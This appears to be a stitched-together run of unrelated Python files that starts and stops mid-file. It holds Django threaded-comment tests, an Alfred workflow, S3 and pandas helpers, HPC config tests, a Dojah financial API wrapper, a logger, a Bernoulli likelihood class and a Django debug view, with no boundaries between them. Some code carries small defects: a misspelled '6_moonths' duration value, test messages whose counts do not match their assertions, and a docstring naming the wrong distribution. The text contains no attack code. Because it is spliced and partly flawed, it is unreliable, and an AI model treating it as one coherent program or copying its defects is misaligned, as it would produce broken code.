October...") class TreeCommentManagerTestCase(ArticleBaseTestCase): def setUp(self): super().setUp() self.article_ct = ContentType.objects.get(app_label="tests", model="article") self.site1 = Site.objects.get(pk=1) self.site2 = Site.objects.create(domain='site2.com', name='site2.com') self.root_1 = TreeComment.objects.get_or_create_root(self.article_1) self.root_1_pk = self.root_1.pk self.root_2 = TreeComment.objects.get_or_create_root(self.article_1, site=self.site2) self.root_2_pk = self.root_2.pk with open(join(dirname(__file__), 'data/draftjs_raw.json'), 'r') as fp: self.draft_raw = fp.read() def post_comment_1(self): r = TreeComment.objects.get(pk=self.root_1_pk) r.add_child(comment="just a testing comment") def post_comment_2(self): r = TreeComment.objects.get(pk=self.root_2_pk) r.add_child(comment="yet another comment") def post_comment_3(self): r = TreeComment.objects.get(pk=self.root_1_pk) r.add_child(comment="and another one") def post_comment_4(self): r = TreeComment.objects.get(pk=self.root_2_pk) r.add_child(comment="just a testing comment in site2") def test_for_app_models(self): # there is no comment posted yet to article_1 nor article_2 count = TreeComment.objects.for_app_models("tests.article").count() self.assertEqual(count, 0) self.post_comment_1() count = TreeComment.objects.for_app_models("tests.article").count() self.assertEqual(count, 1) self.post_comment_2() count = TreeComment.objects.for_app_models("tests.article").count() self.assertEqual(count, 2) self.post_comment_3() count = TreeComment.objects.for_app_models("tests.article").count() self.assertEqual(count, 3) self.post_comment_4() count = TreeComment.objects.for_app_models("tests.article").count() self.assertEqual(count, 4) def test_multi_site_for_app_models(self): self.post_comment_1() # To site1. self.post_comment_4() # To site2. count_site1 = TreeComment.objects.for_app_models("tests.article", site=self.site1).count() self.assertEqual(count_site1, 1) count_site2 = TreeComment.objects.for_app_models("tests.article", site=self.site2).count() self.assertEqual(count_site2, 1) def test_get_root_on_invalid_obj(self): """ get_root should return None with invalid obj""" r = TreeComment.objects.get_root(self.article_2) self.assertIsNone(r, 'Expected no root to be found') def test_create_comment_for_obj(self): """ Test out the custom manager method """ comment = 'Test Value' c = TreeComment.objects.create_for_object( self.article_2, comment=comment ) self.assertEqual(c.comment.raw, comment, "Expected to create new comment here") def test_create_markdown_comment(self): """ Validate a very basic markdown render """ comment = dedent(''' #Heading Body Text ''').strip() comment_rendered = dedent('''

    Heading

    Body Text

    ''').strip() c = TreeComment.objects.create_for_object( self.article_2, comment=comment, comment_markup_type='markdown' ) self.assertEqual(c.comment.raw, comment, "Expected raw comment to match original") self.assertEqual(c.comment.rendered, comment_rendered, "Expected rendered to match markdown output") def test_create_draftail_comment(self): """ Validate a very basic draftjs render """ comment_rendered = dedent('''

    Text 1.

    Test 2.

    ''').strip() c = TreeComment.objects.create_for_object( self.article_2, comment=self.draft_raw, comment_markup_type='draftjs' ) self.assertEqual(c.comment.raw, self.draft_raw, "Expected raw comment to match original") self.assertEqual(c.comment.rendered, comment_rendered, "Expected rendered to match markdown output") # ToDo: in_moderation, for_model, count_for_content_types # ToDo: CommentAssociation: object_pk # In order to test methods 'save' and '_calculate_thread_data', simulate the # following threads, in order of arrival: # # testcase cmt.id parent level-0 level-1 level-2 # step1 1 - c1 <- cmt1 # step1 2 - c2 <- cmt2 # step2 3 1 -- c3 <- cmt1 to cmt1 # step2 4 1 -- c4 <- cmt2 to cmt1 # step3 5 2 -- c5 <- cmt1 to cmt2 # step4 6 5 -- -- c6 <- cmt1 to cmt1 to cmt2 # step4 7 4 -- -- c7 <- cmt1 to cmt2 to cmt1 # step5 8 3 -- -- c8 <- cmt1 to cmt1 to cmt1 # step5 9 - c9 <- cmt9 def thread_test_step_1(article): """ Add Two Comments for the article root - comment 1 comment 2 """ site = Site.objects.get(pk=1) #TreeComment.objects.create() # post Comment 1 with parent_id 0 root = TreeComment.objects.get_or_create_root(article, site=site) root.add_child(comment="comment 1 to article", submit_date=datetime.now()) root.refresh_from_db() # post Comment 2 with parent_id 0 root.add_child(comment="comment 2 to article", submit_date=datetime.now()) root.refresh_from_db() def thread_test_step_2(article): """ Add 2 replies to the first comment root - comment 1 reply 1 reply 2 comment 2 """ site = Site.objects.get(pk=1) root = TreeComment.objects.get_or_create_root(article, site=site) children = root.get_children() c1 = children[0] # post Comment 3 to parent_id 1 c1.add_child(comment="comment 1 to comment 1") # post Comment 4 to parent_id 1 c1.add_child(comment="comment 2 to comment 1") def thread_test_step_3(article): """ root - comment 1 reply 1 reply 2 comment 2 reply 1 """ site = Site.objects.get(pk=1) root = TreeComment.objects.get_or_create_root(article, site=site) c2 = root.get_children()[1] c2.add_child(comment="comment 1 to comment 2") def thread_test_step_4(article): """ root - comment 1 reply 1 reply 2 reply 2.1 comment 2 reply 1 reply 1.1 """ site = Site.objects.get(pk=1) root = TreeComment.objects.get_or_create_root(article, site=site) c1, c2 = root.get_children() c1_children = c1.get_children() c2_children = c2.get_children() c2_children[0].add_child(comment="cmt 1 to cmt 1 to cmt 2") c1_children[1].add_child(comment="cmt 1 to cmt 2 to cmt 1") def thread_test_step_5(article): """ Adds comments out to level 4 root - comment 1 reply 1 reply 2 reply 2.1 reply 2.1.1 comment 2 reply 1 reply 1.1 reply 1.1.1 """ site = Site.objects.get(pk=1) root = TreeComment.objects.get_or_create_root(article, site=site) c1, c2 = root.get_children() c1_children = c1.get_children() c2_children = c2.get_children() c1_grandchildren_list = [c.get_children() for c in c1_children] c2_grandchildren_list = [c.get_children() for c in c2_children] for i, gc in enumerate(c1_grandchildren_list): for g in gc: g.add_child(comment=f'cmt1 to cmt{i} to cmt1 to cmt1') for i, gc in enumerate(c2_grandchildren_list): for g in gc: g.add_child(comment=f'cmt1 to cmt{i} to cmt1 to cmt2') class BaseThreadStep1TestCase(ArticleBaseTestCase): def setUp(self): super().setUp() thread_test_step_1(self.article_1) def test_threaded_comments_step_1_level_0(self): # comment 1 root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_descendant_count(), 2, "Expected to have 2 comments/replies") self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments, no replies") class ThreadStep2TestCase(ArticleBaseTestCase): def setUp(self): super().setUp() thread_test_step_1(self.article_1) thread_test_step_2(self.article_1) def test_threaded_comments_step_2_level_0(self): root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments") c1, c2 = root.get_children() # comment 1 self.assertEqual(c1.get_children_count(), 2, "Expected comment 1 to have 2 replies") # comment 2 self.assertEqual(c2.get_children_count(), 0, "Expected comment 2 to have no replies") class ThreadStep3TestCase(ArticleBaseTestCase): def setUp(self): super().setUp() thread_test_step_1(self.article_1) thread_test_step_2(self.article_1) thread_test_step_3(self.article_1) def test_threaded_comments_step_3_level_0(self): root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments") self.assertEqual(root.get_descendant_count(), 5, "Expected to have 5 total comments and replices") def test_threaded_comments_step_3_level_1(self): root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments") self.assertEqual(root.get_descendant_count(), 5, "Expected to have 5 total comments and replies") c1, c2 = root.get_children() # comment 1 self.assertEqual(c1.get_children_count(), 2, "Expected comment 1 to have 2 replies") # comment 2 self.assertEqual(c2.get_children_count(), 1, "Expected comment 2 to have 1 reply") class ThreadStep4TestCase(ArticleBaseTestCase): def setUp(self): super().setUp() thread_test_step_1(self.article_1) thread_test_step_2(self.article_1) thread_test_step_3(self.article_1) thread_test_step_4(self.article_1) def test_threaded_comments_step_4_level_0(self): root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments") self.assertEqual(root.get_descendant_count(), 7, "Expected to have 7 total comments and replies") c1, c2 = root.get_children() def test_threaded_comments_step_4_level_1(self): root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments") self.assertEqual(root.get_descendant_count(), 7, "Expected to have 5 total comments and replies") c1, c2 = root.get_children() self.assertEqual(c1.get_children_count(), 2, "Expected 2 replies to comment 1") self.assertEqual(c2.get_children_count(), 1, "Expected 1 reply to comment 2") c1_children = c1.get_children() c2_children = c2.get_children() self.assertEqual(c1_children[1].get_children_count(), 1, "Expected 1 replies to comment 1, reply 2") self.assertEqual(c2_children[0].get_children_count(), 1, "Expected 1 reply to comment 2, reply 1") def test_threaded_comments_step_4_level_2(self): root = TreeComment.objects.get_root(self.article_1) class ThreadStep5TestCase(ArticleBaseTestCase): def setUp(self): super().setUp() thread_test_step_1(self.article_1) thread_test_step_2(self.article_1) thread_test_step_3(self.article_1) thread_test_step_4(self.article_1) thread_test_step_5(self.article_1) def test_threaded_comments_step_5_level_0(self): root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments") self.assertEqual(root.get_descendant_count(), 9, "Expected to have 5 total comments and replices") c1, c2 = root.get_children() def test_threaded_comments_step_5_level_1(self): root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments") self.assertEqual(root.get_descendant_count(), 9, "Expected to have 5 total comments and replices") c1, c2 = root.get_children() def test_threaded_comments_step_5_level_2(self): root = TreeComment.objects.get_root(self.article_1) self.assertEqual(root.get_children_count(), 2, "Expected to have 2 comments") self.assertEqual(root.get_descendant_count(), 9, "Expected to have 5 total comments and replices") c1, c2 = root.get_children() self.assertEqual(c1.get_children()[1].get_children()[0].get_children_count(), 1, "Expected 1 grandchild") self.assertEqual(c2.get_children()[0].get_children()[0].get_children_count(), 1, "Expected 1 grandchild") def test_exceed_max_thread_level_raises_exception(self): root = TreeComment.objects.get_or_create_root(self.article_1) LIMIT = settings.COMMENTS_TREE_MAX_THREAD_LEVEL with self.assertRaises(MaxThreadLevelExceededException): comment = root.get_descendants().order_by('-depth').first() print(f"Max Depth is {comment.thread_level}") while comment.thread_level < LIMIT: comment = comment.add_child(comment="Extending the level by one") comment.add_child(comment='This one should cause error') def add_comment_to_diary_entry(diary): root = TreeComment.objects.get_or_create_root(diary) root.add_child(comment='This is a diary comment') class DiaryBaseTestCase(DjangoTestCase): def setUp(self): self.day_in_diary = Diary.objects.create(body="About Today...") self.root = TreeComment.objects.get_or_create_root(self.day_in_diary) def test_max_thread_level_by_app_model(self): self.root = TreeComment.objects.get_or_create_root(self.day_in_diary) c = self.root for x in range(1, settings.COMMENTS_TREE_MAX_THREAD_LEVEL+1): c = c.add_child(comment=f"Comment level {x}") with self.assertRaises(MaxThreadLevelExceededException): c.add_child(comment="Comment should cause an exception now") class TestCommentsForModel(ArticleBaseTestCase): def setUp(self): super().setUp() thread_test_step_1(self.article_1) thread_test_step_1(self.article_2) def test_get_comments_for_model_type(self): comments = TreeComment.objects.for_model(Article) self.assertEqual(len(comments), 4) def test_get_comments_for_model_object(self): comments = TreeComment.objects.for_model(Article()) self.assertEqual(len(comments), 0) def test_get_comments_for_model_instance(self): comments = TreeComment.objects.for_model(self.article_1) self.assertEqual(len(comments), 2) class TestCommentsManager(ArticleBaseTestCase): def setUp(self): super().setUp() self.root = TreeComment.objects.get_or_create_root(self.article_1) thread_test_step_1(self.article_1) thread_test_step_1(self.article_2) def test_validate_association_on_root(self): self.assertIsNotNone(self.root.assoc) self.root.assoc = None self.root.save() self.assertIsNone(self.root.assoc) self.root = TreeComment.objects.get_or_create_root(self.article_1) self.assertIsNotNone(self.root.assoc) def test_moderation(self): moderated = TreeComment.objects.in_moderation() self.assertEqual(len(moderated.all()), 0) c1 = TreeComment.objects.first() c1.is_public = False c1.save() moderated = TreeComment.objects.in_moderation() self.assertEqual(len(moderated.all()), 1) def test_count_for_model(self): count1 = TreeComment.objects.count_for_model(Article) count2 = TreeComment.objects.count_for_model(self.article_1) count3 = TreeComment.objects.count_for_model(self.article_2) self.assertEqual(4, count1) self.assertEqual(2, count2) self.assertEqual(2, count3) houTS/SwitchHosts # -*- coding: utf-8 -*- import sys # the workflow package below can be downloaded from: # https://github.com/deanishe/alfred-workflow/releases from workflow import Workflow, ICON_WEB, web def get_subtitle(item): content = item.get('content', '') return content.partition('\n')[0].strip() def main(wf): url = 'http://127.0.0.1:50761/api/list' r = web.get(url) # throw an error if request failed # Workflow will catch this and show it to the user r.raise_for_status() # Parse the JSON returned by pinboard and extract the posts result = r.json() items = result['data'] # Loop through the returned posts and add an item for each to # the list of results for Alfred for item in items: on = item.get('on', False) wf.add_item(title=item['title'], subtitle=get_subtitle(item), arg=item['id'], valid=True, icon='on.png' if on else 'off.png') # Send the results to Alfred as XML wf.send_feedback() if __name__ == '__main__': my_wf = Workflow() sys.exit(my_wf.run(main)) from django.urls import path from .views import TestView urlpatterns = [ path('', TestView.as_view()), ] import boto3, os import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sn ######################### # 전처리 ######################### def upload_s3(bucket, file_path, prefix): ''' bucket = sagemaker.Session().default_bucket() prefix = 'comprehend' train_file_name = 'test/train/train.csv' s3_train_path = upload_s3(bucket, train_file_name, prefix) ''' prefix_path = os.path.join(prefix, file_path) # prefix_test_path = os.path.join(prefix, 'infer/test.csv') boto3.Session().resource('s3').Bucket(bucket).Object(prefix_path).upload_file(file_path) s3_path = "s3://{}/{}".format(bucket, prefix_path) # print("s3_path: ", s3_path) return s3_path def filter_df(raw_df, cols): ''' cols = ['label','userno', 'ipaddr','try_cnt','paytool_cnt','total_amount','EVENT_DATE'] df = filter_df(df, cols) ''' df = raw_df.copy() df = df[cols] return df def split_data_date(raw_df, sort_col,data1_end, data2_start): ''' train, test 데이터 분리 train_end = '2020-01-31' test_start = '2020-02-01' train_df, test_df = split_data_date(df, sort_col='EVENT_DATE', data1_end = train_end, data2_start = test_start) ''' df = raw_df.copy() df = df.sort_values(by= sort_col) # 시간 순으로 정렬 # One-Hot-Encoding data1 = df[df[sort_col] <= data1_end] data2 = df[df[sort_col] >= data2_start] print(f"data1, data2 shape: {data1.shape},{data2.shape}") print(f"data1 min, max date: {data1[sort_col].min()}, {data1[sort_col].max()}") print(f"data2 min, max date: {data2[sort_col].min()}, {data2[sort_col].max()}") return data1, data2 def convert_date_type(raw_df, col1, dtype='str'): ''' train_pd = convert_date_type(train_pd, col1='customer_zip_code_prefix') ''' df = raw_df.copy() if df.columns.isin([col1]).any(): df[col1] = df[col1].astype(dtype) print(df[col1].dtypes) else: pass return df ######################### # 레이블 인코더 ######################### # from sklearn import preprocessing import numpy as np from sklearn.preprocessing import LabelEncoder class LabelEncoderExt(object): ''' Source: # https://stackoverflow.com/questions/21057621/sklearn-labelencoder-with-never-seen-before-values ''' def __init__(self): """ It differs from LabelEncoder by handling new classes and providing a value for it [Unknown] Unknown will be added in fit and transform will take care of new item. It gives unknown class id """ self.label_encoder = LabelEncoder() # self.classes_ = self.label_encoder.classes_ def fit(self, data_list): """ This will fit the encoder for all the unique values and introduce unknown value :param data_list: A list of string :return: self """ self.label_encoder = self.label_encoder.fit(list(data_list) + ['Unknown']) self.classes_ = self.label_encoder.classes_ return self def transform(self, data_list): """ This will transform the data_list to id list where the new values get assigned to Unknown class :param data_list: :return: """ new_data_list = list(data_list) for unique_item in np.unique(data_list): if unique_item not in self.label_encoder.classes_: new_data_list = ['Unknown' if x==unique_item else x for x in new_data_list] return self.label_encoder.transform(new_data_list) def make_test_label_encoding(raw_train_df, raw_test_df,cols): ''' label_cols = ['customer_city','customer_state','customer_zip_code_prefix'] train_pd_lb, test_pd_lb = make_test_label_encoding(train_pd, test_pd, label_cols) ''' train_df = raw_train_df.copy() test_df = raw_test_df.copy() for lb_col in cols: print("Starting: ", lb_col) le = LabelEncoderExt() le = le.fit(train_df[lb_col]) train_en = le.transform(train_df[lb_col]) test_en = le.transform(test_df[lb_col]) lb_col_name = 'lb_' + lb_col print("new col name: ", lb_col_name) train_df[lb_col_name] = train_en train_df[lb_col_name] = train_df[lb_col_name].astype('str') test_df[lb_col_name] = test_en test_df[lb_col_name] = test_df[lb_col_name].astype('str') return train_df, test_df ######################### # 평가 ######################### import itertools def plot_conf_mat(cm, classes, title, cmap = plt.cm.Greens): print(cm) plt.imshow(cm, interpolation='nearest', cmap=cmap) plt.title(title) plt.colorbar() tick_marks = np.arange(len(classes)) plt.xticks(tick_marks, classes, rotation=45) plt.yticks(tick_marks, classes) fmt = 'd' thresh = cm.max() / 2. for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])): plt.text(j, i, format(cm[i, j], fmt), horizontalalignment="center", color="black" if cm[i, j] > thresh else "black") plt.tight_layout() plt.ylabel('True label') plt.xlabel('Predicted label') 1-10 from jsonextended import edict, utils # from jsonschema import ValidationError from atomic_hpc.config_yaml import format_config_yaml, renumber_config_yaml example_file_minimal = """ runs: - id: 1 name: run1 """ expected_output_minimal = [ { "description": "", "environment": "unix", "input": None, "output": { "remote": None, "path": "output", "remove": None, "rename": None }, "process": { "unix": { "run": None }, "windows": { "run": None }, "qsub": { "jobname": None, "cores_per_node": 16, "nnodes": 1, "memory_per_node": None, "tmpspace": None, "walltime": "24:00:00", "queue": None, "email": None, "modules": None, "run": None, "start_in_temp": True } }, "id": 1, "name": "run1" } ] example_file_maximal = """ defaults: description: quantum-espresso run environment: qsub input: remote: hostname: login.cx1.hpc.imperial.ac.uk username: cjs14 variables: var1: value var2: value nprocs: 2 files: file1: path/to/file1 scripts: - path/to/script1.in - path/to/script2.in output: remote: hostname: login.cx1.hpc.imperial.ac.uk username: cjs14 path: path/to/top/level/output remove: - tmp/ rename: .other.out: .other.qe.out process: unix: run: - mpirun -np @v{nprocs} pw.x -i script1.in > main.qe.scf.out qsub: cores_per_node: 16 nnodes: 1 walltime: 1:00:00 queue: queue_name email: modules: - quantum-espresso - intel-suite - mpi run: - mpiexec pw.x -i script2.in > main.qe.scf.out runs: - id: 1 name: run1 input: variables: var1: overridevalue - id: 2 name: run2 input: scripts: - path/to/other/script1.in - path/to/script2.in variables: var2: overridevalue """ expected_output_maximal = [ { "description": "quantum-espresso run", "environment": "qsub", "input": { "path": None, "scripts": [ "path/to/script1.in", "path/to/script2.in" ], "files": { "file1": "path/to/file1" }, "binaries": None, "variables": { "var1": "overridevalue", "var2": "value", "nprocs": 2 }, "remote": { "hostname": "login.cx1.hpc.imperial.ac.uk", "port": 22, "username": "cjs14", "password": None, "pkey": None, "key_filename": None, "timeout": None } }, "output": { "remote": { "hostname": "login.cx1.hpc.imperial.ac.uk", "port": 22, "username": "cjs14", "password": None, "pkey": None, "key_filename": None, "timeout": None }, "path": "path/to/top/level/output", "remove": [ "tmp/" ], "rename": { ".other.out": ".other.qe.out" } }, "process": { "unix": { "run": [ "mpirun -np @v{nprocs} pw.x -i script1.in > main.qe.scf.out" ] }, "windows": { "run": None }, "qsub": { "jobname": None, "cores_per_node": 16, "nnodes": 1, "memory_per_node": None, "tmpspace": None, "walltime": "1:00:00", "queue": "queue_name", "email": "", "modules": [ "quantum-espresso", "intel-suite", "mpi" ], "start_in_temp": True, "run": [ "mpiexec pw.x -i script2.in > main.qe.scf.out" ], } }, "id": 1, "name": "run1" }, { "description": "quantum-espresso run", "environment": "qsub", "input": { "path": None, "scripts": [ "path/to/other/script1.in", "path/to/script2.in" ], "files": { "file1": "path/to/file1" }, "binaries": None, "variables": { "var1": "value", "var2": "overridevalue", "nprocs": 2 }, "remote": { "hostname": "login.cx1.hpc.imperial.ac.uk", "port": 22, "username": "cjs14", "password": None, "pkey": None, "key_filename": None, "timeout": None } }, "output": { "remote": { "hostname": "login.cx1.hpc.imperial.ac.uk", "port": 22, "username": "cjs14", "password": None, "pkey": None, "key_filename": None, "timeout": None }, "path": "path/to/top/level/output", "remove": [ "tmp/" ], "rename": { ".other.out": ".other.qe.out" } }, "process": { "unix": { "run": [ "mpirun -np @v{nprocs} pw.x -i script1.in > main.qe.scf.out" ] }, "windows": { "run": None }, "qsub": { "jobname": None, "cores_per_node": 16, "nnodes": 1, "memory_per_node": None, "tmpspace": None, "walltime": "1:00:00", "queue": "queue_name", "email": "", "modules": [ "quantum-espresso", "intel-suite", "mpi" ], "start_in_temp": True, "run": [ "mpiexec pw.x -i script2.in > main.qe.scf.out" ], } }, "id": 2, "name": "run2" } ] def test_format_minimal(): file_obj = utils.MockPath('config.yml', is_file=True, content=example_file_minimal) output = format_config_yaml(file_obj) # handy for updating # import json # print(json.dumps(output, indent=4)) assert edict.diff(output, expected_output_minimal) == {} def test_format_maximal(): file_obj = utils.MockPath('config.yml', is_file=True, content=example_file_maximal) output = format_config_yaml(file_obj) # handy for updating # import json # print(json.dumps(output, indent=4)) assert edict.diff(output, expected_output_maximal) == {} def test_renumber_config_yaml(): example_file = """ # a comment runs: - name: run1 - name: run2 - name: run3 - name: run4 - name: run5 - name: run6 """ in_file_obj = utils.MockPath('config.yml', is_file=True, content=example_file) out_file_obj = utils.MockPath('config.yml', is_file=True, content="") renumber_config_yaml(in_file_obj, out_file_obj) expected = """File("config.yml") Contents: # a comment runs: - name: run1 id: 1 - name: run2 id: 2 - name: run3 id: 3 - name: run4 id: 4 - name: run5 id: 5 - name: run6 id: 6""" assert out_file_obj.to_string(file_content=True) == expected """ The financial services APIs are available to retrieve financial information of users from various banks via internet banking. To make use of these APIs, you must have been verified on the Dojah app. The widget is the interface your users see when they need to submit the internet details. You can set up the widget here https://api-docs.dojah.io/docs/financial-widget. Our financial widget process flow: Your application allows your end users to launch the widget The end user fills the registration process which includes selecting financial institution etc. After successful completion, the widget returns a secret key in your Dojah application which would be used to make APIs calls """ from dojahcore.core import DojahBase class Financial(DojahBase): """ """ @classmethod def account_information(cls,account_id): """ Retrieves the bank account information of a customer. params : account_id : str -> required - Gotten from the financial widget """ response = cls().requests.get('/api/v1/financial/account_information',query =[('account_id',account_id)]) return response @classmethod def account_transactions(cls, account_id, last_transaction_id=None, start_date=None, end_date=None, trans_type=None, response_mode=None, callback_url=None): """ This endpoint allows users retrieve customer's transaction details from their bank accounts. Transaction details include the bank name linked to the transaction, amount, location, transaction type (credit or debit), time, and date of occurrence. params : account_id : str -> required - Gotten from the financial widget last_transaction_id : str -> optional - the oldest transaction ID you want to start with start_date : str -> optional - the start date of transaction you want to get end_date : str -> optional - the end date of transaction you want to get trans_type : str -> optional - (debit or credit) response_mode : str -> optional - Your preferred mode of results. (paginated, not_paginated, or webhook) Defaults to paginated callback_url : str -> optional - callback url used as webhook returns : Json data from Dojah API """ query = { 'account_id': account_id } if last_transaction_id: query['last_transaction_id'] = last_transaction_id if start_date: query['start_date'] = start_date if end_date: query['end_date'] = end_date trans_types = ['credit','debit'] if trans_type: if trans_type in trans_types: query['trans_type']= trans_type else: raise ValueError('transaction type should be credit or debit') response_modes = ['paginated', 'not_paginated', 'webhook'] if response_mode: if response_mode in response_modes: query['response_mode'] = response_mode else: raise ValueError("response_mode should be paginated, not_paginated or webhook") if response_mode == 'webhook' and not callback_url: raise ValueError('Callback Url required for webhook response type') if callback_url: query['callback_url'] = callback_url response = cls().requests.get('/api/v1/financial/account_transactions',query=query) return response @classmethod def account_subscription(cls, account_id, start_date=None, end_date=None, status=None): """ This endpoint allows you to retrieve recurring payments that occur daily, weekly, monthly, or yearly from transactions. The endpoint returns the transaction date, amount, the name of the service that the service subscribed to (e.g. Netflix), the subscription duration (i.e. yearly or monthly subscription), etc. params : account_id : str -> required - account ID gotten from the widget start_date : str -> optional - the start date of transaction you want to get end_date : str -> optional - the end date of transaction you want to get status : str -> optional - (expired or not_expired) returns: Json data from Dojah API """ query = { 'account_id': account_id } statuses = ['expired','not_expired'] if status: if status in statuses: query['status'] = status else: raise ValueError('Status should be either of expired or not_expired') if start_date: query['start_date'] = start_date if end_date: query['end_date'] = end_date response = cls().requests.get('/api/v1/financial/account_subscription', query=query) return response @classmethod def earning_structure(cls,account_id,duration): """ This endpoint allows developers to determine if a customer is a salary earner, and to determine the amount of employer's income. params : account_id : str -> required - account id gotten from the widget duration : str -> optional - (6_months,12_months,24_months) returns : Json data from Dojah API """ query = { 'account_id': account_id } durations = ['6_moonths','12_months','24_months'] if duration in durations: query['duration'] = duration response = cls().requests.get('/api/v1/financial/earning_structure',query=query) return response @classmethod def spending_pattern(cls, account_id, duration): """ This endpoint gives insights on users' spending habits based on transactions, and it comes in percentages. params : account_id : str -> required - account id gotten from the widget duration : str -> optional - (6_months,12_months,24_months) returns : Json data from Dojah API """ query = { 'account_id': account_id } durations = ['6_moonths','12_months','24_months'] if duration in durations: query['duration'] = duration response = cls().requests.get('/api/v1/financial/spending_pattern',query=query) return response @classmethod def categorize_transactions(cls, description, trans_type): """ This endpoint allows you to categorize your transactions using our machine learning model and merchant validation system. params : description : str -> required - description of the transaction trans_type : str -> required - (debit or credit) returns : Json data from Dojah API """ if not description: raise ValueError('Description can not be None') body = { 'description': description } trans_types = ['credit','debit'] if trans_type: if trans_type in trans_types: body['trans_type'] = trans_type else: raise ValueError('trans_type must be either of credit or debit') else: raise ValueError('trans_type can not be None') response = cls().requests.post('/api/v1/ml/categorize_transaction',body=body) return response @classmethod def send_transactions(cls, transactions): """This endpoint will post the transactions and return an account_id. params : transactions : array of transactions sample : [ { "transaction_date":"2021-04-30", "transaction_type":"credit", "transaction_amount":"2016.4", "reference_number":"12345tgfnde", "transaction_description":"0033199479:Int.Pd:01-04-2021 to 30-04-2 |" } ] returns : Json Data from Dojah API """ body ={ 'transactions': transactions } response = cls().requests.post('/api/v1/financial/transactions',body=body) return response @classmethod def update_transactions(cls, account_id, transactions): """ This endpoint will update transactions params : transactions : array of transactions sample : [ { "transaction_date":"2021-04-30", "transaction_type":"credit", "transaction_amount":"2016.4", "reference_number":"12345tgfnde", "transaction_description":"0033199479:Int.Pd:01-04-2021 to 30-04-2 |" } ] returns : Json Data from Dojah API """ body ={ 'transactions': transactions } response = cls().requests.put('/api/v1/financial/transactions/{}'.format(account_id),body=body) return response import pytz import logging from logging.handlers import TimedRotatingFileHandler from datetime import datetime, timedelta from logging.config import fileConfig from settings import LOG_LEVEL TIMEZONE = 'Asia/Hong_Kong' time_zone = pytz.timezone(TIMEZONE) def posix2local(timestamp, tz=time_zone): """Seconds since the epoch -> local time as an aware datetime object.""" return datetime.fromtimestamp(timestamp, tz) class Formatter(logging.Formatter): def converter(self, timestamp): return posix2local(timestamp) def formatTime(self, record, datefmt=None): dt = self.converter(record.created) if datefmt: s = dt.strftime(datefmt) else: t = dt.strftime(self.default_time_format) s = self.default_msec_format % (t, record.msecs) return s def get_logger(log_name, log_fname=None, log_level=None): try: fileConfig('logging_cfg.ini') except Exception as err: fileConfig('funds_crawler/logging_cfg.ini') if not log_fname: log_fname = log_name + '.log' log_fname = 'logs/' + log_fname # log_name = datetime.now(time_zone).strftime("%Y%m%d") + '.log' format_str = "%(asctime)s [%(name)-2s] %(levelname)-2s: %(message)s" # file_handler = logging.FileHandler(log_name) # Apply the timerotating file logger. file_handler = TimedRotatingFileHandler(log_fname, when='midnight', interval=1, backupCount=7) if not log_level: log_level = LOG_LEVEL file_handler.setLevel(LOG_LEVEL) file_handler.setFormatter(Formatter(format_str)) if not log_name: logger = logging.getLogger(log_name) else: logger = logging.getLogger(log_name) logger.addHandler(file_handler) return logger likelihoods/bernoulli.py # # () # Universidad Carlos III de Madrid # May 2020 import torch import numpy as np from likelihoods.likelihood import Likelihood from torch.distributions.normal import Normal from torch.distributions.bernoulli import Bernoulli as Ber class Bernoulli(Likelihood): """ Class for Gaussian Likelihood """ def __init__(self): super(Bernoulli, self).__init__() def pdf(self, f, y): sigmoid = torch.nn.Sigmoid() p = sigmoid(f)#.flatten() bernoulli = Ber(probs=p) pdf = torch.exp(bernoulli.log_prob(y)) return pdf def logpdf(self, f, y): sigmoid = torch.nn.Sigmoid() p = sigmoid(f).flatten() bernoulli = Ber(probs=p) logpdf = bernoulli.log_prob(y) return logpdf def variational_expectation(self, y, m, v): # Gauss-Hermite Quadrature gh_p, gh_w = self.gh_points() gh_w = torch.div(gh_w, np.sqrt(np.pi)) m, v, y = m.flatten(), v.flatten(), y.flatten() f = gh_p[None, :] * torch.sqrt(2. * v[:, None]) + m[:, None] y = y[:,None].repeat(1,f.size(1)) logp = self.logpdf(f.view(-1), y.view(-1)) logp = logp.view(f.size()).double() gh_w = gh_w[:, None] var_exp = logp.mm(gh_w) return var_exp def log_predictive(self, y_test, mu_gp, v_gp, num_samples=1000): N_test = y_test.size(0) # function samples: normal = Normal(loc=mu_gp.flatten(), scale=torch.sqrt(v_gp).flatten()) f_samples = torch.reshape(normal.sample(sample_shape=(1,num_samples))[0,:,:], (-1,)) # monte-carlo: logpdf = self.logpdf(f_samples, y_test.repeat(num_samples,1).flatten()) log_pred = -np.log(num_samples) + torch.logsumexp(logpdf, dim=0) return -log_pred from django.shortcuts import render,HttpResponse from apps.interface.services.HTTP_interface_debugService import HTTP_interfaceDebugService from apps.common.func.CommonFunc import * from apps.common.func.LanguageFunc import * from apps.common.helper.ApiReturn import ApiReturn from AutotestWebD import settings import json,time,logging from apps.common.func.WebFunc import * from apps.common.model.RedisDBConfig import * from all_models.models import * logger = logging.getLogger("web") def interfaceDebugAdd(request): testDebugId = "interfaceDebug_%s_%s" % (request.session.get("loginName"),int(time.time() * 1000)) if request.method != 'POST': addUserLog(request, "单接口管理->添加接口调试->请求方式错误", "FAIL") return HttpResponse(ApiReturn(ApiReturn.CODE_METHOD_ERROR,"请求方式错误","").toJson()) data = json.loads(request.POST.get("interfaceData")) data['version'] = request.session.get("version") if data["method"] != "GET" and data["method"] != "HEAD": file = request.FILES bodyContent = data["bodyContent"] bodyType = data["bodyType"] if bodyType == "binary": if "realPath" in bodyContent: data["bodyContent"] = json.dumps(bodyContent,ensure_ascii=False) else: if not file.get("file"): pass thisFile = file.get("file") contentRealPath = updateFileSave(request.session.get("loginName"), thisFile, "0") bodyContent["realPath"] = contentRealPath bodyContent["fileType"] = thisFile.content_type data["bodyContent"] = 